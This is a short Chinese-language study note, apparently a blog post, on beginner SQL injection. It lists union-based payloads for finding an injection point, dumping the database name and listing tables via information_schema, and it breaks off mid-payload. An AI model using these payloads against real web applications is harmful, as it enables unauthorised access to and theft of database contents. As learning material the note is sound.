简单的SQL注入学习笔记
刚刚开始入手,对于一个SQL没学明白的人来说有点痛苦,各种命令语句。
简单的SQL注入:
select … from … where id=‘参数’ //找到注入点,可以测试‘. “ . ’).”).
?id=-1’ /不正确的值/union select 1,2,database() --+//爆库名,–+是注释
?id=-1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_sc
原创
2020-10-19 17:55:58 ·
169 阅读 ·
0 评论